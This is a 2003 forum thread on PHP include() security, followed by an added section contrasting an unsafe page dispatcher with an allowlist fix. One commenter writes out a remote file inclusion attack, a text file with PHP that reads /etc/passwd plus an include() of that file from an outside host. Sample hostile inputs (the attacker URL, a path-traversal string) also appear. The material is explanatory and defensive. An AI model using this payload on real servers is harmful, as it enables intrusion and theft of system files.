Article:
  Ten Security Checks for PHP, Part 1
Subject:   Not the kind of article i would expect from o'reilly!
Date:   2003-03-29 05:08:06
From:   anonymous2
Response to: Not the kind of article i would expect from o'reilly!

Include *can* harm your server; read the comments in the PHP documentation before you spread misinformation:


http://www.php.net/manual/en/function.include.php


  • Not the kind of article i would expect from o'reilly!
    2003-05-23 00:10:42  clancymalcolm

    To further clarify how include(...) can harm your own server...

    I can upload a file to my webserver called crack.txt that contains the following:
    <?php
    readfile("/etc/passwd");
    ?>

    Notice that this is a .txt file - my web server won't execute the PHP code contained in the file.

    Now if I can make YOUR web server run the code
    include("http://www.mywebserver.com/crack.txt");

    Then YOUR web server will show me its /etc/passwd file. Of course I could have done almost anything else in my source code - delete files, run other programs, etc. - almost anything that the web server's user account has permissions to do.

    Clancy.
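The remote-include scenario in this thread is the classic case of passing client-controlled data to include(). The following is an added example, not code from the thread or from the O'Reilly article: it places a page dispatcher that hands the request parameter straight to include() next to a hardened version that maps only allowlisted names to server-side paths. The directory layout (pages/home.php, pages/about.php) and the function names are assumptions for the illustration.

```php
<?php
// Added example, not from the original thread. Shows the unsafe and the
// hardened form of a "which page to show" dispatcher.

// UNSAFE: the client-supplied string reaches include() unchanged.
// If remote fopen wrappers are enabled, a URL such as the crack.txt case in the
// thread is fetched and executed; even with them disabled, "../" sequences
// still reach local files the web server user can read.
function render_page_unsafe(string $page): void
{
    include($page);
}

// HARDENED: a fixed allowlist maps short names to paths built on the server.
// Nothing the client sends is ever used as a path or URL. (Assumed layout.)
const PAGE_MAP = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

// Exact-key lookup: "http://...", "../etc/passwd" and "home.php" all miss,
// so only the two known files can ever be included.
function resolve_page(string $page): ?string
{
    return PAGE_MAP[$page] ?? null;
}

function render_page_safe(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo "Unknown page\n";
        return;
    }
    include($path);
}

// Constructed sample inputs; this loop only resolves names and does not
// include anything, so it can be run on its own to see what gets rejected.
$samples = [
    'home',
    'about',
    'http://www.mywebserver.com/crack.txt',  // the URL from the thread
    '../../etc/passwd',
    'home.php',
];
foreach ($samples as $s) {
    $r = resolve_page($s);
    printf("%-40s => %s\n", $s, $r === null ? 'REJECTED' : 'allowed: ' . basename($r));
}
```

Two points worth keeping in mind when applying this. First, the allowlist is the control: filtering out "http://" or "../" from the input is far weaker than never letting the input become a path at all. Second, the PHP runtime settings are defence in depth, not a substitute. At the time of this 2003 thread the relevant switch was allow_url_fopen in php.ini; since PHP 5.2 there is a separate allow_url_include directive, and both should be off on any server that does not specifically need remote streams. Running the web server under an account with minimal filesystem permissions limits what a successful include can read or do, which is exactly the scope Clancy describes.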